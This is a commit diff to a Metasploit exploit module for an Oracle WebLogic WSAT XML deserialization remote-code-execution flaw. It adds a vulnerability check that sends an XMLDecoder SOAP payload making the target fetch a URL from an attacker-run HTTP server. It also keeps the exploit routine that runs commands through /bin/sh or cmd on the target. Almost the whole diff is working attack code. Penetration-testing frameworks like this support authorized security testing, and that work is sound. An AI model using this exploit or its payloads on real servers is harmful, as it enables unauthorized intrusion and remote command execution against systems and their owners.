Add check and update for some style considerations

kkirsche · web-flow · commit a28d4a4b5b37 · 2018-01-11T17:28:09.000-05:00
diff --git a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -4,9 +4,10 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(
@@ -17,7 +18,9 @@ def initialize(info = {})
             The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
         remote code execution vulnerability. Supported versions that are affected are
         10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
-        of ERPScan and Federico Dotta of Media Service.
+        of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,
+        HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check
+        and will not be used when executing the exploit itself.
         ),
         'License'        => MSF_LICENSE,
         'Author'         => [
@@ -50,20 +53,33 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
-      Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on'),
-      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0])
+      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
+      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 30])
     ])
   end
 
   def cmd_base
-    target['Platform'] == 'win' ? 'cmd' : '/bin/sh'
+    if target['Platform'] == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
   end
 
   def cmd_opt
-    target['Platform'] == 'win' ? '/c' : '-c'
+    if target['Platform'] == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
   end
 
-  def process_builder_payload
+
+  #
+  # This generates a XML payload that will execute the desired payload on the RHOST
+  #
+  def exploit_process_builder_payload
     # Generate a payload which will execute on a *nix machine using /bin/sh
     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
   <soapenv:Header>
@@ -90,36 +106,100 @@ def process_builder_payload
 </soapenv:Envelope>}
   end
 
-# Not sure how to catch the response, so I'll leave this here in case someone can help
-# This payload is used by sending to the RHOST and then you will receive an HTTP request
-# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
-#   def http_check_payload
-#     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
-#   <soapenv:Header>
-#     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
-#       <java version="1.8" class="java.beans.XMLDecoder">
-#         <object id="url" class="java.net.URL">
-#           <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
-#         </object>
-#         <object idref="url">
-#           <void id="stream" method = "openStream" />
-#         </object>
-#       </java>
-#     </work:WorkContext>
-#     </soapenv:Header>
-#   <soapenv:Body/>
-# </soapenv:Envelope>}
-#   end
+  #
+  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
+  # from the target machine.
+  #
+  def check_process_builder_payload
+    return_request_url = "http://#{lookup_actual_host}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java version="1.8" class="java.beans.XMLDecoder">
+        <object id="url" class="java.net.URL">
+          <string>#{return_request_url.encode(xml: :text)}</string>
+        </object>
+        <object idref="url">
+          <void id="stream" method = "openStream" />
+        </object>
+      </java>
+    </work:WorkContext>
+    </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
+  # the logs too much with a no response error or similar.
+  #
+  def on_request_uri(cli, request)
+    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
+    send_response(cli, random_content)
+
+    @received_request = true
+  end
+
+  #
+  # Identifies our public IP address so that we can make sure to include it instead of 0.0.0.0
+  # in our payload.
+  #
+  def lookup_actual_host()
+    # Get the source address
+    if datastore['SRVHOST'] == '0.0.0.0'
+      Rex::Socket.source_address('50.50.50.50')
+    else
+      datastore['SRVHOST']
+    end
+  end
+
+  #
+  # The exploit method connects to the remote service and sends a randomly generated string
+  # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive
+  # the response from. This is based off of the exploit technique from
+  # exploits/windows/novell/netiq_pum_eval.rb
+  #
+  def check
+    datastore['URIPATH'] = '/' + datastore['URIPATH'] if datastore['URIPATH'] !~ /^\//
+
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => datastore['URIPATH']
+    }})
+
+    print_status('Sending the check payload...')
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path),
+      'data'     => check_process_builder_payload,
+      'ctype'    => 'text/xml;charset=UTF-8'
+    }, datastore['TIMEOUT'])
+
+    print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...")
+
+    waited = 0
+    while (not @received_request)
+      select(nil, nil, nil, 1)
+        waited += 1
+      if (waited > datastore['HTTP_DELAY'])
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+    return Exploit::CheckCode::Vulnerable
+  end
 
   #
-  # The exploit method connects to the remote service and sends 1024 random bytes
-  # followed by the fake return address and then the payload.
+  # The exploit method connects to the remote service and sends the specified payload
+  # encapsulated within a SOAP XML body.
   #
   def exploit
     send_request_cgi({
       'method'   => 'POST',
       'uri'      => normalize_uri(target_uri.path),
-      'data'     => process_builder_payload,
+      'data'     => exploit_process_builder_payload,
       'ctype'    => 'text/xml;charset=UTF-8'
     }, datastore['TIMEOUT'])
   end
